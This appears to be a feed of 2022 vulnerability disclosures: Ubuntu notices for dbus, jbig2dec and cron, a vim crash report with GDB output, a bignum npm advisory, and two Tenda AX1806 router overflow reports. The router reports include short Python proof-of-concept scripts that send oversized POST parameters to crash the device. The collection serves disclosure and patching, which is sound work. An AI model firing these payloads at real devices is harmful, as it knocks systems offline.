Ubuntu Security Notice 5244-2 - USN-5244-1 fixed a vulnerability in DBus. This update provides the corresponding update for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. Daniel Onaca discovered that DBus contained a use-after-free vulnerability, caused by the incorrect handling of usernames sharing the same UID. An attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5244-2  
May 09, 2022

dbus vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

DBus could be made to crash if it received specially crafted  
input.

Software Description:  
- dbus: simple interprocess messaging system

Details:

USN-5244-1 fixed a vulnerability in DBus. This update provides  
the corresponding update for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

Original advisory details:

  Daniel Onaca discovered that DBus contained a use-after-free   
vulnerability,  
  caused by the incorrect handling of usernames sharing the same UID. An  
  attacker could possibly use this issue to cause DBus to crash, resulting  
  in a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   dbus                            1.12.16-2ubuntu2.2  
   libdbus-1-3                     1.12.16-2ubuntu2.2

Ubuntu 18.04 LTS:  
   dbus                            1.12.2-1ubuntu1.3  
   libdbus-1-3                     1.12.2-1ubuntu1.3

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5244-2  
   https://ubuntu.com/security/notices/USN-5244-1  
   CVE-2020-35512

Package Information:  
   https://launchpad.net/ubuntu/+source/dbus/1.12.16-2ubuntu2.2  
   https://launchpad.net/ubuntu/+source/dbus/1.12.2-1ubuntu1.3

Ubuntu Security Notice USN-5244-2

NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.

**Description**

NULL Pointer Dereference in function vim\_regexec\_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.

**POC**

    ./vim -u NONE -X -Z -e -s -S ./poc_n.dat -c :qa!
    Segmentation fault
    
    

poc\_n.dat

**GDB**

    ─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000d21602 in vim_regexec_string (rmp=0x7fffffff8aa0, line=0x606000003bc0 "/home/fuzz/fuzz-vim/vim-master/src/3\312) 00cmd\217brea\340\353", <incomplete sequence \373>, col=0, nl=0) at regexp.c:2729
    2729        if (rmp->regprog->re_in_use)
    ─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     0x0000000000d215e7  vim_regexec_string+567 cmp    %cl,%al
     0x0000000000d215e9  vim_regexec_string+569 jl     0xd215fb <vim_regexec_string+587>
     0x0000000000d215ef  vim_regexec_string+575 mov    0x118(%rbx),%rdi
     0x0000000000d215f6  vim_regexec_string+582 callq  0x4a1350 <__asan_report_load4>
     0x0000000000d215fb  vim_regexec_string+587 mov    0x118(%rbx),%rax
     0x0000000000d21602  vim_regexec_string+594 cmpl   $0x0,(%rax)
     0x0000000000d21605  vim_regexec_string+597 je     0xd2166c <vim_regexec_string+700>
     0x0000000000d2160b  vim_regexec_string+603 mov    0x175ed04,%ecx
     0x0000000000d21612  vim_regexec_string+610 mov    $0x17259e0,%rax
     0x0000000000d21619  vim_regexec_string+617 mov    (%rax),%rax
    ─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
        rax 0x0000000000000014     rbx 0x00007fffffff87a0     rcx 0x0000000000000000    rdx 0x0000000000000000    rsi 0x0000606000003bc0    rdi 0x00007fffffff8aa0    rbp 0x00007fffffff89a0    rsp 0x00007fffffff86a0        r8 0x000000000205be00
         r9 0x000000000000e4bc     r10 0x000000000000e404     r11 0x000000000000e400    r12 0x000000000041fe30    r13 0x00007fffffffe500    r14 0x0000000000005604    r15 0x0000000000005600    rip 0x0000000000d21602    eflags [ PF ZF IF RF ]
         cs 0x00000033              ss 0x0000002b              ds 0x00000000             es 0x00000000             fs 0x00000000             gs 0x00000000
    ─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     2724      int        result;
     2725      regexec_T    rex_save;
     2726      int        rex_in_use_save = rex_in_use;
     2727
     2728      // Cannot use the same prog recursively, it contains state.
     2729      if (rmp->regprog->re_in_use)
     2730      {
     2731      emsg(_(e_cannot_use_pattern_recursively));
     2732      return FALSE;
     2733      }
    ─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [0] from 0x0000000000d21602 in vim_regexec_string+594 at regexp.c:2729
    [1] from 0x0000000000d220ba in vim_regexec+90 at regexp.c:2812
    [2] from 0x000000000053f2ae in fname_match+622 at buffer.c:2964
    [3] from 0x000000000051afd4 in buflist_match+324 at buffer.c:2936
    [4] from 0x0000000000515835 in buflist_findpat+4053 at buffer.c:2656
    [5] from 0x00000000007f739e in do_one_cmd+50910 at ex_docmd.c:2532
    [6] from 0x00000000007e49a6 in do_cmdline+14134 at ex_docmd.c:992
    [7] from 0x0000000000e88e0d in do_source_ext+13725 at scriptfile.c:1674
    [8] from 0x0000000000e85867 in do_source+103 at scriptfile.c:1801
    [9] from 0x0000000000e8519d in cmd_source+2317 at scriptfile.c:1174
    [+]
    ─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [1] id 2521650 name vim from 0x0000000000d21602 in vim_regexec_string+594 at regexp.c:2729
    ─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    arg rmp = 0x7fffffff8aa0: {regprog = 0x0,startp = {[0] = 0x7fffffff8e28 "\025", [1] = 0x6110000007e5 …, line = 0x606000003bc0 "/home/fuzz/fuzz-vim/vim-master/src/3\312) 00cmd\217brea\340\353", <incomplete sequen…, col = 0, nl = 0
    loc result = 32767, rex_save = {reg_match = 0x619000001c78,reg_mmatch = 0x100ff7a00,reg_startp = 0x619000001c78,reg_endp = 0x2ffff7…, rex_in_use_save = 0
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    >>> p rmp->regprog
    $1 = (regprog_T *) 0x0
    

**Impact**

NULL Pointer Dereference in function vim\_regexec\_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.

CVE-2022-1620: NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in vim

NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2.4901. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.

All versions of the npm package bignum are vulnerable to Denial of Service (DoS) due to a type-check exception in V8. When verifying the type of the second argument to the .powm function, V8 will crash regardless of Node try/catch blocks.

**Uncaught Exception in bignum**

High severity GitHub Reviewed Published May 7, 2022 • Updated May 24, 2022

GHSA-6429-3g3w-6mw5: Uncaught Exception in bignum

All versions of package bignum are vulnerable to Denial of Service (DoS) due to a type-check exception in V8, when verifying the type of the second argument to the .powm function, V8 will crash regardless of Node try/catch blocks.

CVE-2022-25324

All versions of package bignum are vulnerable to Denial of Service (DoS) due to a type-check exception in V8, when verifying the type of the second argument to the
.powm function, V8 will crash regardless of Node try/catch blocks.



Ubuntu Security Notice 5405-1 - It was discovered that jbig2dec incorrectly handled memory when parsing invalid files. An attacker could use this issue to cause jbig2dec to crash, leading to a denial of service. It was discovered that jbig2dec incorrectly handled memory when processing untrusted input. An attacker could use this issue to cause a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5405-1May 05, 2022jbig2dec vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in jbig2dec.Software Description:- jbig2dec: JBIG2 decoder libraryDetails:It was discovered that jbig2dec incorrectly handled memory when parsinginvalid files. An attacker could use this issue to cause jbig2dec to crash, leading to a denial of service. (CVE-2017-9216)It was discovered that jbig2dec incorrectly handled memory when processing untrusted input. An attacker could use this issue to cause a denial of service, or possibly execute arbitrary code. (CVE-2020-12268)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   jbig2dec                          0.12+20150918-1ubuntu0.1+esm2   libjbig2dec0                    0.12+20150918-1ubuntu0.1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5405-1   CVE-2017-9216, CVE-2020-12268

Ubuntu Security Notice USN-5405-1

Ubuntu Security Notice 5259-2 - USN-5259-1 fixed several vulnerabilities in Cron. This update provides the corresponding update for Ubuntu 18.04 LTS. It was discovered that the postinst maintainer script in Cron unsafely handled file permissions during package install or update operations. An attacker could possibly use this issue to perform a privilege escalation attack.

==========================================================================  
Ubuntu Security Notice USN-5259-2  
May 06, 2022

cron vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Cron.

Software Description:  
- cron: process scheduling daemon

Details:

USN-5259-1 fixed several vulnerabilities in Cron. This update provides  
the corresponding update for Ubuntu 18.04 LTS.

Original advisory details:

  It was discovered that the postinst maintainer script in Cron unsafely  
  handled file permissions during package install or update operations.  
  An attacker could possibly use this issue to perform a privilege  
  escalation attack. (CVE-2017-9525)

  Florian Weimer discovered that Cron incorrectly handled certain memory  
  operations during crontab file creation. An attacker could possibly use  
  this issue to cause a denial of service. (CVE-2019-9704)

  It was discovered that Cron incorrectly handled user input during crontab  
  file creation. An attacker could possibly use this issue to cause a denial  
  of service. (CVE-2019-9705)

  It was discovered that Cron contained a use-after-free vulnerability in  
  its force_rescan_user function. An attacker could possibly use this issue  
  to cause a denial of service. (CVE-2019-9706)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   cron                            3.0pl1-128.1ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5259-2  
   https://ubuntu.com/security/notices/USN-5259-1  
   CVE-2017-9525, CVE-2019-9704, CVE-2019-9705, CVE-2019-9706

Package Information:  
   https://launchpad.net/ubuntu/+source/cron/3.0pl1-128.1ubuntu1.1

Ubuntu Security Notice USN-5259-2

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the list parameter in the function fromSetIpMacBind. This vulnerability allows attackers to cause a Denial of Service (DoS).

Permalink

Cannot retrieve contributors at this time

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/AX1806.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

**Affected version**

v1.0.0.1

**Vulnerability details**

tdhttpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromSetIpMacBind function, which is accessible via the URL goform/SetIpMacBind.

*   

The function takes the POST argument list, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"list": b'A'\*0x800,
    b"bindnum": b"1"
}
res \= requests.post("http://127.0.0.1/goform/SetIpMacBind", data\=data)
print(res.content)

CVE-2022-28971: IoT-vuln/readme.md at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a heap overflow via the mac parameter in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS).

Permalink

**Tenda AX1806 GetParentControlInfo function heap overflow****Overview**

*   The device's official website: https://www.tenda.com.cn/product/AX1806.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

**Affected version**

v1.0.0.1

**Vulnerability details**

/bin/tdhttpd has a heap overflow vulnerability.The vulnerability exists in GetParentControlInfo function, we can through the URL goform/GetParentControlInfo access to it.

*   

The function takes the POST parameter mac, does not verify its length, and copies it directly to the heap memory, resulting in a heap overflow.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"mac": b"A"\*0x400
}
res \= requests.post("http://127.0.0.1/goform/GetParentControlInfo", data\=data)
print(res.content)

I use qemu-user to emulate it. When I run the POC script, I can see

Tag

#dos